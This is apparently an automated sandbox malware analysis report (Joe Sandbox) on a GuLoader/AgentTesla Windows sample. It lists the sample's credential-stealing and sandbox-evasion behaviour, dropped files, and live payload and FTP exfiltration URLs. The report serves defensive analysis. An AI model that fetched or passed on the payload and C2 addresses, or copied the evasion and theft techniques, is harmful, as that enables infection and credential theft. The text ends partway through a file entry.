Date post: | 30-Mar-2023 |
Category: |
Documents |
Upload: | khangminh22 |
View: | 0 times |
Download: | 0 times |
ID: 638284Sample Name:ref002062022pago062022.exeCookbook: default.jbsTime: 16:43:36Date: 02/06/2022Version: 34.0.0 Boulder Opal
2444444444445555555556667788888899999
10
10111111111111111111111212121313131414141414141516161616171717
1717182020
Table of Contents
Table of ContentsWindows Analysis Report ref002062022pago062022.exe
OverviewGeneral InformationDetectionSignaturesClassification
Process TreeMalware Configuration
Threatname: GuLoaderYara Signatures
Memory DumpsSigma SignaturesSnort SignaturesJoe Sandbox Signatures
AV DetectionNetworkingData ObfuscationMalware Analysis System EvasionHIPS / PFW / Operating System Protection EvasionStealing of Sensitive InformationRemote Access Functionality
Mitre Att&ck MatrixBehavior GraphScreenshots
ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesWorld Map of Contacted IPs
Public IPs
General InformationWarnings
SimulationsBehavior and APIs
Joe Sandbox View / ContextIPsDomainsASNsJA3 FingerprintsDropped Files
Created / dropped FilesC:\Users\user\AppData\Local\Temp\Ostentativt.ArnC:\Users\user\AppData\Local\Temp\TChinese.iniC:\Users\user\AppData\Local\Temp\datastrrelsens.Til5C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dllC:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.pngC:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl\Device\ConDrv
Static File InfoGeneralFile IconStatic PE Info
GeneralEntrypoint PreviewRich HeadersData DirectoriesSectionsResourcesImportsVersion InfosPossible Origin
Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS Queries
Copyright Joe Security LLC 2022 Page 2 of 26
20202021212121222222
2222
2222
2323
2323
232324242424
252525
262626
262626
26
DNS AnswersHTTP Request Dependency GraphHTTP Packets
StatisticsBehavior
System BehaviorAnalysis Process: ref002062022pago062022.exePID: 3504, Parent PID: 8512
GeneralFile ActivitiesRegistry Activities
Analysis Process: CasPol.exePID: 1664, Parent PID: 3504General
Analysis Process: CasPol.exePID: 1740, Parent PID: 3504General
Analysis Process: CasPol.exePID: 1900, Parent PID: 3504General
Analysis Process: CasPol.exePID: 2172, Parent PID: 3504General
Analysis Process: CasPol.exePID: 1836, Parent PID: 3504GeneralFile Activities
File CreatedFile WrittenFile Read
Registry ActivitiesKey CreatedKey Value Created
Analysis Process: conhost.exePID: 1840, Parent PID: 1836GeneralFile Activities
Analysis Process: svchost.exePID: 1900, Parent PID: 888GeneralRegistry Activities
Disassembly
Copyright Joe Security LLC 2022 Page 3 of 26
Windows Analysis Report ref002062022pago062022.exe
Overview
General Information
Sample Name:
ref002062022pago062022.exe
Analysis ID: 638284
MD5: 7500c0e8df88d1…
SHA1: 5e20971a917ceb…
SHA256: a4888274290402…
Infos:
Detection
AgentTesla,GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Multi AV Scanner detection for subm…
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via fi…
Writes to foreign memory regions
Tries to harvest and steal Putty / W…
Tries to detect Any.run
Tries to harvest and steal ftp login c…
Tries to detect sandboxes and other…
C2 URLs / IPs found in malware con…
Queries sensitive network adapter in…
Tries to harvest and steal browser in…
Queries sensitive BIOS Information…
Uses 32bit PE files
Queries the volume information (nam…
May sleep (evasive loops) to hinder…
Contains functionality to shutdown /…
Uses code obfuscation techniques (…
Internet Provider seen in connection…
Detected potential crypto function
Found potential string decryption / a…
Sample execution stops while proce…
Yara detected Credential Stealer
Contains functionality to call native …
Contains functionality to dynamicall…
Contains functionality for execution …
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / U…
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PE…
Uses a known web browser user age…
Checks if the current process is bei…
Classification
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
System is w10x64native
ref002062022pago062022.exe (PID: 3504 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 7500C0E8DF88D12316724078FFBEEFAA)
CasPol.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
CasPol.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
CasPol.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
CasPol.exe (PID: 2172 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
CasPol.exe (PID: 1836 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
svchost.exe (PID: 1900 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: F586835082F632DC8D9404D83BC16316)
cleanup
{ "Payload URL": "http://jmariecompany.com/Buhari0f_XGXisVNVRE198.bin"}
Source Rule Description Author Strings
00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp
JoeSecurity_GuLoader_2
Yara detected GuLoader
Joe Security
00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
JoeSecurity_AgentTesla_1
Yara detected AgentTesla
Joe Security
Process Tree
Malware Configuration
Threatname: GuLoader
Yara Signatures
Memory Dumps
Copyright Joe Security LLC 2022 Page 4 of 26
AV Detection
Networking
Data Obfuscation
Malware Analysis System Evasion
HIPS / PFW / Operating System Protection Evasion
Stealing of Sensitive Information
00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
JoeSecurity_CredentialStealer
Yara detected Credential Stealer
Joe Security
00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp
JoeSecurity_GuLoader_2
Yara detected GuLoader
Joe Security
Process Memory Space: CasPol.exe PID: 1836 JoeSecurity_AgentTesla_1
Yara detected AgentTesla
Joe Security
Click to see the 1 entries
Source Rule Description Author Strings
⊘ No Sigma rule has matched
⊘ No Snort rule has matched
Sigma Signatures
Snort Signatures
Joe Sandbox Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Yara detected GuLoader
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Copyright Joe Security LLC 2022 Page 5 of 26
Remote Access Functionality
InitialAccess
Execution PersistencePrivilegeEscalation
DefenseEvasion
CredentialAccess
DiscoveryLateralMovement
Collection ExfiltrationCommandandControl
NetworkEffects
RemoteServiceEffects
Impact
ValidAccounts
2 1 1WindowsManagementInstrumentation
1DLL Side-Loading
1DLL Side-Loading
1Disable orModifyTools
2OSCredentialDumping
3File andDirectoryDiscovery
RemoteServices
1ArchiveCollectedData
ExfiltrationOver OtherNetworkMedium
1IngressToolTransfer
Eavesdropon InsecureNetworkCommunication
RemotelyTrackDeviceWithoutAuthorization
1SystemShutdown/Reboot
DefaultAccounts
1Native API
Boot orLogonInitialization Scripts
1AccessTokenManipulation
1Deobfuscate/DecodeFiles orInformation
1Credentialsin Registry
1 1 7SystemInformationDiscovery
RemoteDesktopProtocol
2Data fromLocalSystem
ExfiltrationOverBluetooth
1EncryptedChannel
Exploit SS7to RedirectPhoneCalls/SMS
RemotelyWipe DataWithoutAuthorization
DeviceLockout
DomainAccounts
At (Linux) LogonScript(Windows)
1 1 1ProcessInjection
2ObfuscatedFiles orInformation
SecurityAccountManager
3 3 1SecuritySoftwareDiscovery
SMB/Windows AdminShares
1EmailCollection
AutomatedExfiltration
2Non-ApplicationLayerProtocol
Exploit SS7to TrackDeviceLocation
ObtainDeviceCloudBackups
DeleteDeviceData
LocalAccounts
At(Windows)
LogonScript(Mac)
LogonScript(Mac)
1DLL Side-Loading
NTDS 1ProcessDiscovery
DistributedComponentObjectModel
1ClipboardData
ScheduledTransfer
1 1 2ApplicationLayerProtocol
SIM CardSwap
CarrierBillingFraud
CloudAccounts
Cron NetworkLogonScript
NetworkLogonScript
2 5 1Virtualization/SandboxEvasion
LSASecrets
2 5 1Virtualization/SandboxEvasion
SSH Keylogging DataTransferSize Limits
FallbackChannels
ManipulateDeviceCommunication
ManipulateApp StoreRankingsor Ratings
ReplicationThroughRemovableMedia
Launchd Rc.common
Rc.common
1AccessTokenManipulation
CachedDomainCredentials
1ApplicationWindowDiscovery
VNC GUI InputCapture
ExfiltrationOver C2Channel
MultibandCommunication
Jamming orDenial ofService
AbuseAccessibility Features
ExternalRemoteServices
ScheduledTask
StartupItems
StartupItems
1 1 1ProcessInjection
DCSync NetworkSniffing
WindowsRemoteManagement
Web PortalCapture
ExfiltrationOverAlternativeProtocol
CommonlyUsed Port
Rogue Wi-Fi AccessPoints
DataEncryptedfor Impact
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected AgentTesla
Mitre Att&ck Matrix
Behavior Graph
Copyright Joe Security LLC 2022 Page 6 of 26
Behavior Graph
ID: 638284
Sample: ref002062022pago062022.exe
Startdate: 02/06/2022
Architecture: WINDOWS
Score: 100
jmariecompany.com alighierieventos.com
Found malware configuration Antivirus detectionfor URL or domain
Multi AV Scanner detectionfor submitted file 4 other signatures
ref002062022pago062022.exe
2 22
started
C:\Users\user\AppData\Local\...\System.dll, PE32
dropped
Writes to foreign memoryregions Tries to detect Any.run
CasPol.exe
15 11
started
CasPol.exe
started
svchost.exe
started
3 other processes
jmariecompany.com
139.28.232.231, 49746, 80
DEDIPATH-LLCUS
Netherlands
Tries to harvest andsteal Putty / WinSCP
information (sessions,passwords, etc)
Tries to steal Mailcredentials (via file/ registry access)
Tries to harvest andsteal ftp login credentials 2 other signatures
conhost.exe
started
Queries sensitive networkadapter information
(via WMI, Win32_NetworkAdapter,often done to detect
virtual machines)
Queries sensitive BIOSInformation (via WMI,
Win32_Bios & Win32_BaseBoard,often done to detect
virtual machines)
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Hide Legend
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Screenshots
Thumbnails
Copyright Joe Security LLC 2022 Page 7 of 26
Source Detection Scanner Label Link
ref002062022pago062022.exe 16% Virustotal Browse
ref002062022pago062022.exe 22% ReversingLabs Win32.Downloader.GuLoader
Source Detection Scanner Label Link
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll 3% Metadefender Browse
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll 0% ReversingLabs
⊘ No Antivirus matches
⊘ No Antivirus matches
Source Detection Scanner Label Link
https://api.ipify.org%t- 0% Avira URL Cloud safe
ftp://alighierieventos.com/buhari0f9ja 100% Avira URL Cloud malware
tVzYUP.com 0% Avira URL Cloud safe
127.0.0.1:HTTP/1.1 0% Avira URL Cloud safe
https://api.ipify.org%%startupfolder% 0% Avira URL Cloud safe
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2 0% Avira URL Cloud safe
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin 0% Avira URL Cloud safe
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Dropped Files
Unpacked PE Files
Domains
URLs
Copyright Joe Security LLC 2022 Page 8 of 26
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
0% Avira URL Cloud safe
DynDns.comDynDNSnamejidpasswordPsi/Psi 0% Avira URL Cloud safe
https://rPVMd8mXTm2hvq.com 0% Avira URL Cloud safe
Source Detection Scanner Label Link
Name IP Active Malicious Antivirus Detection Reputation
dual-a-0001.a-msedge.net 13.107.21.200 true false unknown
alighierieventos.com 50.31.177.39 true false unknown
jmariecompany.com 139.28.232.231 true true unknown
Name Malicious Antivirus Detection Reputation
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin true Avira URL Cloud: safe unknown
Name Source Malicious Antivirus Detection Reputation
https://api.ipify.org%t- CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe low
ftp://alighierieventos.com/buhari0f9ja CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
true Avira URL Cloud: malware unknown
tVzYUP.com CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
127.0.0.1:HTTP/1.1 CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe low
https://api.ipify.org%%startupfolder% CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe low
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2CasPol.exe, 00000007.00000002.5725601189.0000000001546000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1098316376.000000000154C000.00000004.00000020.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
nsis.sf.net/NSIS_ErrorError ref002062022pago062022.exe false high
schemas.xmlsoap.org/ws/2005/05/identity/claims/name
CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp
false high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
DynDns.comDynDNSnamejidpasswordPsi/Psi CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
https://rPVMd8mXTm2hvq.com CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1041975921.000000001C6D1000.00000004.00000020.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
Domains and IPs
Contacted Domains
Contacted URLs
URLs from Memory and Binaries
World Map of Contacted IPs
Copyright Joe Security LLC 2022 Page 9 of 26
No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs
IP Domain Country Flag ASN ASN Name Malicious
139.28.232.231 jmariecompany.com Netherlands 35913 DEDIPATH-LLCUS true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 638284
Start date and time: 02/06/202216:43:36 2022-06-02 16:43:36 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ref002062022pago062022.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed:
37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/7@3/1
EGA Information: Successful, ratio: 100%
Public IPs
General Information
Copyright Joe Security LLC 2022 Page 10 of 26
HDC Information: Successful, ratio: 18.5% (good quality ratio 18.1%)Quality average: 88.2%Quality standard deviation: 21.4%
HCA Information: Successful, ratio: 99%Number of executed functions: 0Number of non-executed functions: 0
Cookbook Comments: Found application associated with file extension: .exeAdjust boot timeEnable AMSI
Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe,MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exeTCP Packets have been reduced to 100Excluded IPs from analysis (wh itelisted): 40.117.96.136, 13.107.5.88, 51.105.236.244, 51.124.57.242Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e-0009.e-msedge.net, arc.msn.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.comNot all processes where analyzed, report is missing behavior informationReport size exceeded maximum capacity and may have missing b ehavior information.Report size exceeded maximum capacity and may have missing d isassembly code.Report size getting too big, t oo many NtAllocateVirtualMemory calls found.Report size getting too big, t oo many NtOpenKeyEx calls found.Report size getting too big, t oo many NtProtectVirtualMemory calls found.Report size getting too big, t oo many NtQueryValueKey calls found.Report size getting too big, t oo many NtReadVirtualMemory ca lls found.Report size getting too big, t oo many NtSetInformationFile calls found.
Time Type Description
16:46:22 API Interceptor 2759x Sleep call for process: CasPol.exe modified
⊘ No context
⊘ No context
⊘ No context
⊘ No context
⊘ No context
Warnings
Simulations
Behavior and APIs
Joe Sandbox View / Context
IPs
Domains
ASNs
JA3 Fingerprints
Dropped Files
Created / dropped FilesCopyright Joe Security LLC 2022 Page 11 of 26
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: data
Category: dropped
Size (bytes): 84955
Entropy (8bit): 6.493773506936205
Encrypted: false
SSDEEP: 1536:+c+7NKOl3NFSGc4zKyxqBfoRio6XA5A/x8aveGlalwm:+c+b57Nc4Tqat2/xgl5
MD5: 7913F41BDE98D253E411ED6C39072084
SHA1: 0F278DD10891F54ED93490358D8E2962D7CB4446
SHA-256: E48696EE8CACBBF70AB01F8BCFA00887BC1F499233419BCFA9963AECE2F5F061
SHA-512: 3D32411E45A46C3526BDD3B92134DC67B8485F1A97FAE97CA0F7B67C4BA74925AC26003603019B44D04F34B0966AD6615F34F354E6259F8D88B21E62543435ED
Malicious: false
Reputation: low
Preview: ..............5...........................................................d.f....&#I.2......................................f........81.O.....................................................f.....f.........2...Ibbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb..s.f.a...f......)9q.<...............................................b.....f....#.FEo.........................................f.e....."NxA2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<...i...f.......i.*.LLLLLLLLLLLLLLLLLLLLLLLLL......f......r.&....f].................................t......4..2................................................................!...f................................f....c..e..r.a.$c,.l66666666666666666666666666666666..G.,...........f....-w..=...........................................v......j..r.?.1..*Z.............................................f....q...q.f.b.f...f...........nnnnnnnnnnnnnnnnnnnnnnnnnnn...o.......a.....+q.3L ....c......!5.!@.............................
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 2298
Entropy (8bit): 4.473680609114741
Encrypted: false
SSDEEP: 48:rL4i5ST3JO8HvYe6jj90Pb/wt2Btvtl3IoweHuK:rL4i52JhHvYe63CjtHv39d
MD5: 92F6C6E96B642FDFAE071A6522F8D23D
SHA1: 7ABB9950955094F3717E5CE55D6C4EE4C4AC9B61
SHA-256: F1156ACD8EE2349454B3C55917E19EF81DB3491B241658B99E6DAF628DEB9913
SHA-512: F3B3548E21CF1BDF47A1191880AE2D8122B1ADDB0E6B371EE3EA3D7D6F205B09213D15492086526D9F9EFC836CFBC880616B1D746B3C9C12F9144B6F9B77ADA0
Malicious: false
Reputation: low
Preview: ..[.T.r.a.n.s.l.a.t.i.o.n.s.].....R.O.G. .X.G. .M.o.b.i.l.e. .p.l.u.g.g.e.d.-.i.n. .=.#..c .R.O.G. .X.G. .o.:yaS.Y.c.v....P.u.s.h. .t.h.e. .".U.n.l.o.c.k. .S.w.i.t.c.h.". .o.n. .t.o.p. .o.f. .t.h.e. .p.l.u.g. .t.o. .l.o.c.k. .y.o.u.r. .c.a.b.l.e. .i.n. .p.l.a.c.e...=..R.c ."......". ..N.\vQ.V.[.0....D.o.n.'.t. .s.h.o.w. .t.h.i.s. .m.e.s.s.a.g.e. .a.g.a.i.n.=..N.Qo.:y....O.K.=.O.K.....C.a.n.c.e.l.=..S.m....A.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=._U.R .R.O.G. .X.G. .o.:yaS.Y.c.v....D.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.\P(u .R.O.G. .X.G. .o.:yaS.Y.c.v....C.l.i.c.k. .O.K. .t.o. .s.w.i.t.c.h. .t.o. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e...=...d .O.K. ..R.c. .R.O.G. .X.G. .o.:yaS.Y.c.v.0....C.l.i.c.k. .O.K. .t.o. .d.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.,. .a.n.d. .t.h.e.n. .s.a.f.e.l.y. .r.e.m.o.v.e. .t.h.e. .d.e.v.i.c.e...=...d .O.K. .\P(u .R.O.G. .X.G. .o.:yaS.Y.c.v&N.[hQ.yd..n..0....P.r.o.c.e.s.s.i.n.g.=.U..t-N....S.w.i.t.c.h. .t.o. .
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 19664
Entropy (8bit): 3.9986948974384626
Encrypted: false
SSDEEP: 384:LW5aeHlhv8r7DhA9znQeTRa1gOOFqV1+dHle6LCS+4ssqpM4XjqJZd:KQqRmXknmKFqV1SCSDZ4zqJZd
MD5: CCA75233F04853DE46ACFD473166211B
SHA1: D053CB686993FD4465B4ED47160675E05B76C96F
SHA-256: 85A665CE6DEBBF8D5FECE6BEF104A8DD0C5EA737DCF95C9F682298769E41ED5F
SHA-512: FD56C82A47E732B68EC5A0077A283921BCDB9B1450C8B04FFDD2768C7626E41009333B737CFC0E674231BE48043A92FE9F7DC9A10346A5BE41BE7CE9988A364C
Malicious: false
C:\Users\user\AppData\Local\Temp\Ostentativt.Arn
C:\Users\user\AppData\Local\Temp\TChinese.ini
C:\Users\user\AppData\Local\Temp\datastrrelsens.Til5
Copyright Joe Security LLC 2022 Page 12 of 26
Preview: FD3DAA0B81D730D768491FC100A7158C21DFB8AFFF7D7C1D7CA584C1112FB48C6FED7C2C7F746C27EE3247226EDACC8AAB50E016B1FEB245D83045D47F36425600A2D5102334C8B3E91DA68E8E6C6AFD2F4D7A5E29B35D18CA2739E4B2B456EF872230EBC9B5DA6F2A487E11FFA6A71DEA278FF78B7CE55121B3E17ED249CD65A676177A369880C08793D3D7CC29CFEF2A873E8815DB5F2638088E5936B3E01182B0C17217709E620F7D77092DB02DE72651DBE054971CC0B370EEDC5B2582D233B91754604562EB914166ADAFBDC11945D9D972D41C37DF9E9759628EE0C8A5EF21D1338E98E4DAD6788B597A1BD7D40FF4562E87FBB0E00608A9057C416388B0BE73D3DF07FE9031097BFC21A000E61FB4FB22DE06399F059E18452DC25E826C234C052CDBB6E60A4325A4F5C6642C6656D5CD6D02BB78A4E5318F5C11408A1667B4D35FFCB43132D8DA53290E7E9184BEDB231841BDE63E98DB9F7B6A5F939664EB0481697514FC01DE0FF20B7FE6A3C09F329442245DA3A0967836BE72DA9EDAE5D7002A0682E36375D9749E1B5481913A276F9C6BFB0D745B64F170B8062E9CEBB1739E05D910D9C2BF7C8FA22E41F77D9860E7C5752EF48E441BE471E5396235F45270C510827EB32D0F2FBE83C40DA7DE1318E831BA13B7C847D19A2169B98041599D3A36B2381150C5A6BEA240CD6447
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.814115788739565
Encrypted: false
SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5: CFF85C549D536F651D4FB8387F1976F2
SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious: false
Antivirus: Antivirus: Metadefender, Detection: 3%, BrowseAntivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*[email protected][email protected][email protected]............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@[email protected].......*[email protected].......`.......,[email protected]................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 195
Entropy (8bit): 6.320143910674748
Encrypted: false
SSDEEP: 3:yionv//thPl9vt3lAnsrtxBll/V0MaYAWrsWm8uH4FTeBT3XLaKwrgpHIQ32kVU7:6v/lhPyskMaDsTuiSBTrar+IQ32k2VLp
MD5: CF42A428EB747F762D55241CFBE28294
SHA1: 6BE84AD9DD71A758407455F58ADEFF7567CD64AA
SHA-256: F27C644A9F71175C447D2C89186F9E88E26BBB30A9D0AB75F4FEF23A44F08C21
SHA-512: 5E92FA2A3B42A863B6D7DD57ADB0EEC4EB5BCAB2344558B456F3C27E9189A6DF6E844A7F628CFC0B494249F03B7F34BC28F8D49A4B5B6110CB488EE1BB001A68
Malicious: false
Preview: .PNG........IHDR................a....sBIT....|.d....zIDAT8..;..0.@.^A........nQ....).....E1..A!....y"..P.\..R.d..Q$..%.,..X.d.x.j. .D`.....Ep....rL8`..sP....d.)....H.k.{.?...5%Zy|N.....IEND.B`.
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 12288
Entropy (8bit): 2.8128752827547734
Encrypted: false
SSDEEP: 96:lP2Ei0UR030i0E0U970Cl40k0U950Cl5090U990ClP0qD0U9H0ClgQ09G:tZk1vyIiPyWj6y6hqAyU3w
MD5: 5D7A3D8D2BEB69CF108F85C7F84F339A
SHA1: 1627D890DD5A3CE7FC5FA048840A45CD73F4C5F5
SHA-256: 443AD11610FFC666B82044B7EE96C9AA753C578F2B1D5376C40748B41DD2CE5C
SHA-512: A666B71B8DC7E399E9C1D5B70F0A77BD0C92DB6E62710BA06D09621FC446549C942FC2F4C911429D37DB15753D3AD9C770420C5B9365698946AA76D658DA2484
Malicious: false
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll
C:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.png
C:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl
Copyright Joe Security LLC 2022 Page 13 of 26
Preview: ....................................................!...............................l...........................bJ..........v..Zb....... [email protected].,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1............................................................-Y..v............E..v..........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.6.0.2._.1.5.5.2.0.3._.8.6.1...e.t.l.............P.P.....l.......................................................................8.B.........19041.1.amd64fre.vb_release.191206-1406.....5.@..........u.5.%Nb.f.};......WaaSMedicSvc.pdb....................................................................................................................................................................................................................................
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 30
Entropy (8bit): 3.964735178725505
Encrypted: false
SSDEEP: 3:IBVFBWAGRHneyy:ITqAGRHner
MD5: 9F754B47B351EF0FC32527B541420595
SHA1: 006C66220B33E98C725B73495FE97B3291CE14D9
